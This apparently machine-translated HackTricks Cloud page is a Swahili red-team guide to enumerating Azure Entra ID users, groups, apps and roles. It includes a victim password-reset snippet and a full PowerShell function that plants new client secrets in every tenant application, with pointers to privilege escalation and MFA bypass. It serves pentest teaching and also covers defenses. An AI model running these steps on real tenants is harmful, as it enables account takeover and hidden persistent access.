HackTricks CloudAz - Entra ID (AzureAD) & Azure IAM
Reading time: 29 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic Information
Azure Active Directory (Azure AD) inatoa huduma ya Microsoft ya msingi ya wingu kwa usimamizi wa utambulisho na ufikiaji. Ni muhimu katika kuwezesha wafanyakazi kuingia na kupata rasilimali, ndani na nje ya shirika, ikiwa ni pamoja na Microsoft 365, lango la Azure, na maombi mengine mengi ya SaaS. Muundo wa Azure AD unalenga kutoa huduma muhimu za utambulisho, ikiwa ni pamoja na uthibitishaji, ruhusa, na usimamizi wa watumiaji.
Vipengele muhimu vya Azure AD vinajumuisha uthibitishaji wa hatua nyingi na ufikiaji wa masharti, pamoja na uunganisho usio na mshono na huduma nyingine za usalama za Microsoft. Vipengele hivi vinainua usalama wa utambulisho wa watumiaji na kuweza kuwezesha mashirika kutekeleza na kutekeleza sera zao za ufikiaji kwa ufanisi. Kama sehemu ya msingi ya mfumo wa huduma za wingu za Microsoft, Azure AD ni muhimu kwa usimamizi wa utambulisho wa watumiaji kwa msingi wa wingu.
Enumeration
Connection
az login #This will open the browser (if not use --use-device-code)
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
## With password
az login --service-principal -u <application ID> -p VerySecret --tenant contoso.onmicrosoft.com # Tenant can also be the tenant UUID
## With cert
az login --service-principal -u <application ID> -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com
# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph
# If you want to configure some defaults
az configure
# Get user logged-in already
az ad signed-in-user show
# Help
az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples
Wakati unapo ingia kupitia CLI kwenye Azure kwa programu yoyote, unatumia Azure Application kutoka tenant inayomilikiwa na Microsoft. Programu hizi, kama zile unazoweza kuunda kwenye akaunti yako, zina client id. Hutaweza kuona zote katika orodha za programu zilizoruhusiwa unazoweza kuona kwenye console, lakini zinaruhusiwa kwa default.
Kwa mfano, powershell script inayofanya uthibitisho inatumia programu yenye client id 1950a258-227b-4e31-a9cf-717495945fc2. Hata kama programu hiyo haitappear kwenye console, sysadmin anaweza kuzuia programu hiyo ili watumiaji wasiweze kufikia kwa kutumia zana zinazounganisha kupitia programu hiyo.
Hata hivyo, kuna client-ids nyingine za programu ambazo zitakuruhusu kuungana na Azure:
# The important part is the ClientId, which identifies the application to login inside Azure
$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue
$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
Wapangaji
# List tenants
az account tenant list
Watumiaji
Kwa maelezo zaidi kuhusu watumiaji wa Entra ID angalia:
# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from Entra ID
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user in Azure (NOT in Entra ID)
az role assignment list --include-inherited --include-groups --include-classic-administrators true --assignee <email>
# Get ALL roles assigned in Azure in the current subscription (NOT in Entra ID)
az role assignment list --include-inherited --include-groups --include-classic-administrators true --all
# Get EntraID roles assigned to a user
## Get Token
export TOKEN=$(az account get-access-token --resource https://graph.microsoft.com/ --query accessToken -o tsv)
## Get users
curl -X GET "https://graph.microsoft.com/v1.0/users" \
-H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" | jq
## Get EntraID roles assigned to an user
curl -X GET "https://graph.microsoft.com/beta/rolemanagement/directory/transitiveRoleAssignments?\$count=true&\$filter=principalId%20eq%20'86b10631-ff01-4e73-a031-29e505565caa'" \
-H "Authorization: Bearer $TOKEN" \
-H "ConsistencyLevel: eventual" \
-H "Content-Type: application/json" | jq
## Get role details
curl -X GET "https://graph.microsoft.com/beta/roleManagement/directory/roleDefinitions/cf1c38e5-3621-4004-a7cb-879624dced7c" \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" | jq
Badilisha Nywila ya Mtumiaji
$password = "ThisIsTheNewPassword.!123" | ConvertTo- SecureString -AsPlainText –Force
(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set- AzureADUserPassword -Password $password –Verbose
MFA & Sera za Ufikiaji wa Masharti
Inapendekezwa sana kuongeza MFA kwa kila mtumiaji, hata hivyo, baadhi ya kampuni hazitaweka au zinaweza kuziweka kwa Ufikiaji wa Masharti: Mtumiaji atakuwa na hitaji la MFA ikiwa ataingia kutoka eneo fulani, kivinjari au hali fulani. Sera hizi, ikiwa hazijawekwa vizuri zinaweza kuwa na uwezekano wa kuepukwa. Angalia:
Az - Conditional Access Policies & MFA Bypass
Makundi
Kwa maelezo zaidi kuhusu makundi ya Entra ID angalia:
# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from Entra ID
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get roles assigned to the group in Azure (NOT in Entra ID)
az role assignment list --include-groups --include-classic-administrators true --assignee <group-id>
# To get Entra ID roles assigned check how it's done with users and use a group ID
Ongeza mtumiaji kwenye kundi
Wamiliki wa kundi wanaweza kuongeza watumiaji wapya kwenye kundi
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
warning
Makundi yanaweza kuwa ya kidinamik, ambayo kimsingi inamaanisha kwamba ikiwa mtumiaji atatimiza masharti fulani atajumuishwa katika kundi. Bila shaka, ikiwa masharti yanategemea sifa ambazo mtumiaji anaweza kudhibiti, anaweza kutumia kipengele hiki vibaya ili kuingia katika makundi mengine.
Angalia jinsi ya kutumia vibaya makundi ya kidinamik katika ukurasa ufuatao:
Wawakilishi wa Huduma
Kwa maelezo zaidi kuhusu wawakilishi wa huduma za Entra ID angalia:
# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName,appId]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# Get SPs with generated secret or certificate
az ad sp list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
warning
Mmiliki wa Huduma Kuu anaweza kubadilisha nenosiri lake.
Orodha na jaribu kuongeza siri ya mteja kwenye kila Programu ya Biashara
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
{
<#
.SYNOPSIS
Add client secret to the applications.
.PARAMETER GraphToken
Pass the Graph API Token
.EXAMPLE
PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
.LINK
https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[String]
$GraphToken = $null
)
$AppList = $null
$AppPassword = $null
# List All the Applications
$Params = @{
"URI" = "https://graph.microsoft.com/v1.0/applications"
"Method" = "GET"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
try
{
$AppList = Invoke-RestMethod @Params -UseBasicParsing
}
catch
{
}
# Add Password in the Application
if($AppList -ne $null)
{
[System.Collections.ArrayList]$Details = @()
foreach($App in $AppList.value)
{
$ID = $App.ID
$psobj = New-Object PSObject
$Params = @{
"URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
"Method" = "POST"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
$Body = @{
"passwordCredential"= @{
"displayName" = "Password"
}
}
try
{
$AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId
Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName
Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText
$Details.Add($psobj) | Out-Null
}
catch
{
Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
}
}
if($Details -ne $null)
{
Write-Output ""
Write-Output "Client secret added to : "
Write-Output $Details | fl *
}
}
else
{
Write-Output "Failed to Enumerate the Applications."
}
}
Maombi
Kwa maelezo zaidi kuhusu Maombi angalia:
Wakati programu inaundwa aina 2 za ruhusa zinatolewa:
- Ruhusa zinazotolewa kwa Huduma Kiongozi
- Ruhusa ambazo programu inaweza kuwa nazo na kutumia kwa niaba ya mtumiaji.
# List Apps
az ad app list
az ad app list --query "[].[displayName,appId]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# Get SPs owned by current user
az ad app list --show-mine
# Get apps with generated secret or certificate
az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json
# Get Global Administrators (full access over apps)
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1b2256f9-46c1-4fc2-a125-5b2f51bb43b7/members"
# Get Application Administrators (full access over apps)
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/1e92c3b7-2363-4826-93a6-7f7a5b53e7f9/members"
# Get Cloud Applications Administrators (full access over apps)
az rest --method GET --url "https://graph.microsoft.com/v1.0/directoryRoles/0d601d27-7b9c-476f-8134-8e7cd6744f02/members"
warning
Programu yenye ruhusa AppRoleAssignment.ReadWrite inaweza kuinua hadhi kuwa Global Admin kwa kujipatia nafasi hiyo.
Kwa maelezo zaidi angalia hii.
note
Mfuatano wa siri ambao programu inatumia kuthibitisha utambulisho wake wakati wa kuomba token ni nenosiri la programu.
Hivyo, ukipata nenosiri hili unaweza kuingia kama service principal ndani ya tenant.
Kumbuka kwamba nenosiri hili linaonekana tu wakati linapotengenezwa (unaweza kulibadilisha lakini huwezi kulipata tena).
Mmiliki wa programu anaweza kuongeza nenosiri kwake (hivyo anaweza kujifanya kuwa yeye).
Kuingia kama service principals hawa hakuonyeshwi kama hatari na hawatakuwa na MFA.**
Inawezekana kupata orodha ya App IDs zinazotumika mara kwa mara ambazo ni za Microsoft katika https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications
Managed Identities
Kwa maelezo zaidi kuhusu Managed Identities angalia:
# List all manged identities
az identity list --output table
# With the principal ID you can continue the enumeration in service principals
Majukumu ya Azure
Kwa maelezo zaidi kuhusu majukumu ya Azure angalia:
# Get roles
az role definition list
# Get all assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,scope:scope,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"
# Get all the roles assigned to a user
az role assignment list --assignee "<email>" --all --output table
# Get all the roles assigned to a user by filtering
az role assignment list --all --query "[?principalName=='admin@organizationadmin.onmicrosoft.com']" --output table
# Get deny assignments
az rest --method GET --uri "https://management.azure.com/{scope}/providers/Microsoft.Authorization/denyAssignments?api-version=2022-04-01"
## Example scope of subscription
az rest --method GET --uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/providers/Microsoft.Authorization/denyAssignments?api-version=2022-04-01"
Entra ID Roles
Kwa maelezo zaidi kuhusu Azure roles angalia:
# List template Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoleTemplates"
# List enabled built-in Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles"
# List all Entra ID roles with their permissions (including custom roles)
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions"
# List only custom Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
# List all assigned Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments"
# List members of a Entra ID roles
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members"
# List Entra ID roles assigned to a user
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/users/<user-id>/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
# List Entra ID roles assigned to a group
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/groups/$GROUP_ID/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
# List Entra ID roles assigned to a service principal
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$SP_ID/memberOf/microsoft.graph.directoryRole" \
--query "value[]" \
--output json
Vifaa
# If you know how to do this send a PR!
warning
Ikiwa kifaa (VM) kime unganishwa na AzureAD, watumiaji kutoka AzureAD wataweza kuingia.
Zaidi ya hayo, ikiwa mtumiaji aliyeingia ni Mmiliki wa kifaa, atakuwa meneja wa ndani.
Vitengo vya Utawala
Kwa maelezo zaidi kuhusu vitengo vya utawala angalia:
# List all administrative units
az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits"
# Get AU info
az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53"
# Get members
az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/members"
# Get principals with roles over the AU
az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/scopedRoleMembers"
Entra ID Privilege Escalation
Azure Privilege Escalation
Az - Azure IAM Privesc (Authorization)
Defensive Mechanisms
Privileged Identity Management (PIM)
Privileged Identity Management (PIM) katika Azure inasaidia kuzuia mamlaka kupita kiasi kutolewa kwa watumiaji bila sababu.
Moja ya sifa kuu zinazotolewa na PIM ni kwamba inaruhusu kutokutoa majukumu kwa wakuu ambao wako hai kila wakati, lakini kuwafanya kuwa na haki kwa kipindi fulani (mfano miezi 6). Kisha, kila wakati mtumiaji anapotaka kuanzisha jukumu hilo, anahitaji kuomba akionyesha muda anahitaji mamlaka (mfano masaa 3). Kisha meneja anahitaji kuidhinisha ombi hilo.
Kumbuka kwamba mtumiaji pia ataweza kuomba kupanua muda.
Zaidi ya hayo, PIM inatuma barua pepe kila wakati jukumu la kipaumbele linapopewa mtu.
.png)
Wakati PIM imewezeshwa, inawezekana kuweka kila jukumu na mahitaji fulani kama:
- Muda wa juu (masaa) wa kuanzishwa
- Hitaji la MFA wakati wa kuanzishwa
- Hitaji la muktadha wa uthibitishaji wa Upatikanaji wa Masharti
- Hitaji la uhalalishaji wakati wa kuanzishwa
- Hitaji la taarifa ya tiketi wakati wa kuanzishwa
- Hitaji la idhini ili kuanzisha
- Muda wa juu wa kuisha kwa majukumu yanayostahiki
- Mengi zaidi ya usanidi kuhusu wakati na nani wa kutuma arifa wakati vitendo fulani vinapotokea na jukumu hilo
Conditional Access Policies
Angalia:
Az - Conditional Access Policies & MFA Bypass
Entra Identity Protection
Entra Identity Protection ni huduma ya usalama inayoruhusu kubaini wakati mtumiaji au kuingia kuna hatari kubwa ili kukubaliwa, ikiruhusu kuzuia mtumiaji au jaribio la kuingia.
Inaruhusu meneja kuiseti ili kuzuia majaribio wakati hatari ni "Chini na juu", "Kati na juu" au "Juu". Ingawa, kwa kawaida ime zimwa kabisa:
.png)
tip
Sasa hivi inashauriwa kuongeza vizuizi hivi kupitia sera za Upatikanaji wa Masharti ambapo inawezekana kuweka chaguo sawa.
Entra Password Protection
Entra Password Protection (https://portal.azure.com/index.html#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade) ni kipengele cha usalama ambacho kinasaidia kuzuia matumizi mabaya ya nywila dhaifu kwa kufunga akaunti wakati majaribio kadhaa yasiyofanikiwa ya kuingia yanapotokea.
Inaruhusu pia kufungia orodha ya nywila maalum ambayo unahitaji kutoa.
Inaweza kutumika kwa kiwango cha wingu na kwenye Active Directory ya ndani.
Njia ya kawaida ni Ukaguzi:
.png)
References
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.